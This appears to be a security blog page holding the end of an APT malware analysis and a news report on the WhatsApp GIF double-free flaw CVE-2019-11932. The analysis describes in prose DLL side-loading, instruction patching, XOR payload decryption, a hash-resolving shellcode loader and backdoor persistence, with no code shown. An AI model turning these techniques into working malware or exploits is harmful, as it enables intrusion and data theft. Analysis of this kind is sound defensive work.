To achieve this, the attacker only needs to find a DLL that 3.exe loads through LoadLibrary (in this case http_dll.dll), create a malicious DLL with the same name as the LoadLibrary parameter, and place it in the same directory as 3.exe. When LoadLibrary is called, 3.exe looks for the DLL in its own directory first and loads it.

When loaded, http_dll.dll locates VirtualProtect and changes the protection of the 16 bytes at RVA 0x157a in the module that loaded it to PAGE_EXECUTE_READWRITE. In this case, the patched location is the instruction jz 0x401533.

To carry out its malicious behaviour, the instruction jz 0x401533 is replaced with push FFFFFFFF, push http_dll.10001230 and ret, redirecting 3.exe to sub_10001230 in the DLL; afterwards, control returns to 3.exe, which continues execution.

In sub_10001230, the malicious code reads the file http_dll.dat in the same directory. The dat file begins with a null-terminated string followed by data; the string is used as the decryption key for the data portion of the file.

The malicious code then allocates a new memory area to hold the result of decrypting the data by XOR with the string key from the dat file.

The malware then changes the protection of this new region to PAGE_EXECUTE_READWRITE and executes the shellcode at that address.

The decoded content is a raw PE file, but it has been cleverly combined with a shellcode that starts at offset 0. This shellcode serves as a loader that maps the raw PE file so that it can execute.

First, the shellcode finds the base address of kernel32.dll and then resolves the functions LoadLibrary, GetProcAddress, ZwFlushInstructionCache and VirtualAlloc by comparing hashes of the names of the functions exported by kernel32.

The loader then reads the PE header, maps the sections to their memory areas, applies relocations and resolves the file's Import Address Table. Once that is complete, execution passes to the DllMain function of this PE file.

Final Payload

Here, the malicious code collects a number of paths it will use, then decrypts a data section.

The decrypted result is a set of strings including the autorun key name and the IP of the C&C server.

The malicious code then performs the following behaviours:

  • It copies the three executable files to the user's profile directory, or to the all-users profile if it has sufficient administrator rights.
  • It adds and locks an autorun entry to launch the dropped executable at restart. It also relaunches itself if this is its first run; the malware distinguishes this by passing itself an extra parameter on subsequent runs.
  • It creates a mutex and connects to the server to receive commands.
    • This backdoor allows an attacker to execute commands remotely.
    • It supports many commands, including uploading files and folders, listing folders, reading files, and collecting computer and user information.

Conclusion

The various attack and evasion techniques used during execution show that the people behind this malware invested a great deal of time in researching the target and developing an attack method to match. APT attacks are carefully resourced operations aimed at stealing important information and damaging the organisation. To prevent APT attacks, always maintain up-to-date precautions and continuous monitoring to ensure the security of users and organisations.

C&C IPs and domains


JUST OPENING AN ORDINARY IMAGE COULD GET YOUR PHONE "HACKED"
30 Oct

Today short clips and GIFs are everywhere: on social media, message boards and chats, helping users express their emotions, have fun, relax and add meaning to a conversation. But what if an innocent-looking GIF greeting with a "Good morning", "Happy Birthday" or "Merry Christmas" message could "hack" the phone in your hand?

WhatsApp (a cross-platform messaging app) recently patched an important security hole in its Android app, fixed three months after it was discovered. If exploited, it could allow hackers to gain access to Android devices and potentially steal files and resources on the device and, more seriously, chat messages or the accounts of other applications on the victim's phone.

WhatsApp Remote Code Execution Vulnerability

The vulnerability, published as CVE-2019-11932, is a "double-free" bug, which simply means that free is called twice on the same dynamically allocated (heap) memory in C. The flaw is not in WhatsApp's own source code but in the open-source library WhatsApp uses to process images.

Discovered by Vietnamese security researcher Pham Hong Nhat in May this year, the vulnerability leads to remote code execution (RCE) attacks, allowing attackers to run arbitrary code on mobile devices running WhatsApp.

“The payload (exploit code) is executed in the WhatsApp context. Therefore, it has the right to read the SD card and access the WhatsApp message database,” the author said in an interview with The Hacker News.

“The malicious code will have all the rights that WhatsApp has, including recording, accessing the camera, accessing the file system, as well as WhatsApp's sandbox files, including messaging facilities and chats protected by the application, etc.”

How does this flaw work?

WhatsApp uses a parsing library to create previews of GIF files when users open the gallery on their device before sending them to friends or family.

So this flaw cannot be triggered simply by sending a malicious GIF file to the victim. Instead, it is triggered when the victim opens the WhatsApp Gallery Picker to send images to others.

Readers can view PoC here:

To exploit this vulnerability, all an attacker needs to do is send a specially crafted malicious GIF (with embedded malicious code) to an Android user through any online channel and wait for the user to open the image gallery in WhatsApp.

However, if an attacker wants to send the GIF to a victim through a messaging platform such as WhatsApp or Messenger, the file must be sent as a document rather than as a media attachment, because the image compression these services apply would corrupt the malicious code hidden in the image.

Vulnerable application versions and patches

The flaw affects WhatsApp 2.19.230 and earlier running on Android 8.1 and 9.0; it does not work on Android 8.0 and below.

"In older versions of Android, the "double-free" flaw can still be triggered. However, because malloc is called by the system after the free calls, the application can only be exploited when I control the registers on the PC," the researcher wrote.

Pham Hong Nhat told The Hacker News that he reported the vulnerability to Facebook, the owner of WhatsApp, at the end of July this year, and that the company shipped a security patch in WhatsApp version 2.19.244, released in September.

Therefore, to protect your device from this vulnerability, you should update WhatsApp to the latest version from the Google Play Store as soon as possible.

In addition, because the vulnerability lies in an open-source library, any other Android application using the same affected library could be vulnerable to the same attack. The affected library, Android GIF Drawable, has also released version 1.2.18 to patch this "double-free" flaw.

WhatsApp for iOS is not affected by this vulnerability.

We will publish a technical analysis of this vulnerability; readers are invited to follow along.

Source: Thehackernews.com